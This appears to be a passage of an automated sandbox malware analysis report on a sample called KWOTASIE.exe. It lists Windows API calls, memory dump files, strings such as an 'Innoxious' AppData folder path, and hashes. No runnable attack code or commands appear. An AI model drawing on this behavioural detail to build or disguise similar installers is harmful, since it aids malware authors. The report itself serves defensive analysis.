                • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Innoxious$Lx$Remove folder: $6B
              • API String ID: 2624150263-1364077795
              • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
              • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
              • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
              • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
              APIs
              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
              Strings
              • C:\Users\user\AppData\Local\Innoxious\olivilin, xrefs: 004021BD
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CreateInstance
              • String ID: C:\Users\user\AppData\Local\Innoxious\olivilin
              • API String ID: 542301482-136261422
              • Opcode ID: 1c7b5804a30cad328b29b1af23ede5e0894dc90a4e1fd6790c8eeac3ce3dce31
              • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
              • Opcode Fuzzy Hash: 1c7b5804a30cad328b29b1af23ede5e0894dc90a4e1fd6790c8eeac3ce3dce31
              • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 3d6c516f40f3da80561d184b45c27c8c6da11a827e53ba382eae435cc270f487
              • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
              • Opcode Fuzzy Hash: 3d6c516f40f3da80561d184b45c27c8c6da11a827e53ba382eae435cc270f487
              • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
              • GetDlgItem.USER32(?,000003E8), ref: 00404430
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
              • GetSysColor.USER32(?), ref: 0040445E
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
              • lstrlenW.KERNEL32(?), ref: 0040447F
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
              • SendMessageW.USER32(00000000), ref: 00404501
              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
              • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
              • SetCursor.USER32(00000000), ref: 00404580
              • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
              • SetCursor.USER32(00000000), ref: 0040459C
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: Lx$N$Remove folder:
              • API String ID: 3103080414-2024812794
              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32(?,?), ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
              • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
              • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
              • wsprintfA.USER32 ref: 00405F17
              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
              • GlobalFree.KERNEL32(00000000), ref: 00406000
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$[Rename]
              • API String ID: 2171350718-461813615
              • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
              • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
              • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
              • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406543
              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00406557
              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KWOTASIE.exe",00403318,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\Desktop\KWOTASIE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-3981424367
              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
              • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
              • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
              • GetSysColor.USER32(00000000), ref: 00404281
              • SetTextColor.GDI32(?,00000000), ref: 0040428D
              • SetBkMode.GDI32(?,?), ref: 00404299
              • GetSysColor.USER32(?), ref: 004042AC
              • SetBkColor.GDI32(?,?), ref: 004042BC
              • DeleteObject.GDI32(?), ref: 004042D6
              • CreateBrushIndirect.GDI32(?), ref: 004042E0
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
              • GetMessagePos.USER32 ref: 00404B9D
              • ScreenToClient.USER32(?,?), ref: 00404BB7
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
              • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
              • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
              APIs
              • GetDC.USER32(?), ref: 00401DB6
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
              • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID: Times New Roman
              • API String ID: 3808545654-927190056
